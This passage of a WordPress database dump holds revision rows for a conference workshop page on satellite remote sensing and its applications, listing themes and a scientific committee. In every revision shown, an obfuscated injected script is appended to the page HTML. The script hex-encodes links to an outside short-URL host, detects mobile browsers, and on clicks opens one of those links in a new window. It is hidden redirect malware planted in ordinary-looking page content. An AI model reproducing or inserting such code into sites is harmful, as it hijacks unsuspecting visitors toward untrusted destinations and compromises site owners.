_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Satellite Remote Sensing and Its Applications</strong>','','inherit','closed','closed','','2996-revision-v1','','','2022-11-04 21:10:26','2022-11-04 21:10:26','',2996,'https://gsw2023.com/?p=3021',0,'revision','',0),
(3022,1,'2022-11-04 21:15:16','2022-11-04 21:15:16','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3019\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">Satellite-based Remote Sensing plays a vital role in a wide spectrum of applications. In this workshop, we target areas related to advancing high-resolution and mid-resolution remote sensing data acquisition and sensor modeling combined with new data processing techniques for information extraction, including machine learning and deep learning. We are also interested in advances in Remote Sensing that help find solutions to modern human problems, including combating climate change and addressing sustainable development. We encourage participation from academia, space agencies, government stakeholders and industrial research and development leaders to share their latest technology and research developments related, but not limited, to the following themes.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"56\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: blue;\"><strong>Themes of the event:</strong></h4>\n<p>&nbsp;</p>\n<h5><strong> Satellite Photogrammetry</strong></h5>\n<ul>\n<li>Stereo/multi-view image-based 3D reconstruction</li>\n<li>Sensor modeling and calibration</li>\n<li>Off-nadir satellite image geometry and true orthorectification</li>\n<li>Application of Neural Radiance Fields (NeRF) in satellite photogrammetry</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Urban Remote Sensing</strong></h5>\n<ul>\n<li>Thermal remote sensing and heat-loss assessment</li>\n<li>Machine/Deep learning for automatic data interpretation and analysis</li>\n<li>Urban area change detection and 2D/3D base map updating</li>\n<li>Disaster assessment, management, and mitigation</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Image integration and data fusion</strong></h5>\n<ul>\n<li>Sensor fusion and multi-modal image processing</li>\n<li>LiDAR and Multispectral data integration</li>\n<li>Hyperspectral image processing and data fusion</li>\n<li>Optical-SAR image integration</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Remote Sensing and sustainable environment</strong></h5>\n<ul>\n<li>Water Resources and Management</li>\n<li>Wastewater and solid waste monitoring</li>\n<li>Weather/atmosphere and climate change</li>\n<li>Forestry/agricultural and ecosystems/biodiversity</li>\n<li>Environmental health applications</li>\n<li>Coastal erosion and cryosphere</li>\n<li>Landuse/landcover mapping and monitoring using artificial intelligence</li>\n<li>Cloud-based image analysis and Google Earth Engine</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Planetary Remote Sensing and Space Agencies program development</strong></h5>\n<ul>\n<li>Planetary Remote Sensing data processing and information extraction</li>\n<li>Cubesat-based earth observation missions</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong> Scientific Committee:</strong></h5>\n<ul>\n<li>Orhan ALTAN, Istanbul Technical University</li>\n<li>Ammatzia Peled, University of Haifa</li>\n<li>Yun Zhang, University of New Brunswick</li>\n<li>Rongxing (Ron) Li, Tongji University</li>\n<li>Marco Scaioni, University Politecnico Milano</li>\n<li>Francesco Pirotti, University of Padova</li>\n<li>Saeid Homayouni, Institut national de la recherche scientifique</li>\n<li>BAHRAM SALEHI, State University of New York</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Satellite Remote Sensing and Its Applications</strong>','','inherit','closed','closed','','2996-revision-v1','','','2022-11-04 21:15:16','2022-11-04 21:15:16','',2996,'https://gsw2023.com/?p=3022',0,'revision','',0),
(3023,1,'2022-11-04 21:17:05','2022-11-04 21:17:05','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3019\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">Satellite-based Remote Sensing plays a vital role in a wide spectrum of applications. In this workshop, we target areas related to advancing high-resolution and mid-resolution remote sensing data acquisition and sensor modeling combined with new data processing techniques for information extraction, including machine learning and deep learning. We are also interested in advances in Remote Sensing that help find solutions to modern human problems, including combating climate change and addressing sustainable development. We encourage participation from academia, space agencies, government stakeholders and industrial research and development leaders to share their latest technology and research developments related, but not limited, to the following themes.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"56\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: blue;\"><strong>Themes of the event:</strong></h4>\n<p>&nbsp;</p>\n<h5><strong> Satellite Photogrammetry</strong></h5>\n<ul>\n<li>Stereo/multi-view image-based 3D reconstruction</li>\n<li>Sensor modeling and calibration</li>\n<li>Off-nadir satellite image geometry and true orthorectification</li>\n<li>Application of Neural Radiance Fields (NeRF) in satellite photogrammetry</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Urban Remote Sensing</strong></h5>\n<ul>\n<li>Thermal remote sensing and heat-loss assessment</li>\n<li>Machine/Deep learning for automatic data interpretation and analysis</li>\n<li>Urban area change detection and 2D/3D base map updating</li>\n<li>Disaster assessment, management, and mitigation</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Image integration and data fusion</strong></h5>\n<ul>\n<li>Sensor fusion and multi-modal image processing</li>\n<li>LiDAR and Multispectral data integration</li>\n<li>Hyperspectral image processing and data fusion</li>\n<li>Optical-SAR image integration</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Remote Sensing and sustainable environment</strong></h5>\n<ul>\n<li>Water Resources and Management</li>\n<li>Wastewater and solid waste monitoring</li>\n<li>Weather/atmosphere and climate change</li>\n<li>Forestry/agricultural and ecosystems/biodiversity</li>\n<li>Environmental health applications</li>\n<li>Coastal erosion and cryosphere</li>\n<li>Landuse/landcover mapping and monitoring using artificial intelligence</li>\n<li>Cloud-based image analysis and Google Earth Engine</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Planetary Remote Sensing and Space Agencies program development</strong></h5>\n<ul>\n<li>Planetary Remote Sensing data processing and information extraction</li>\n<li>Cubesat-based earth observation missions</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong> Scientific Committee:</strong></h5>\n<ul>\n<li>Orhan ALTAN, Istanbul Technical University</li>\n<li>Ammatzia Peled, University of Haifa</li>\n<li>Yun Zhang, University of New Brunswick</li>\n<li>Rongxing (Ron) Li, Tongji University</li>\n<li>Marco Scaioni, University Politecnico Milano</li>\n<li>Francesco Pirotti, University of Padova</li>\n<li>Saeid Homayouni, Institut national de la recherche scientifique</li>\n<li>BAHRAM SALEHI, State University of New York</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 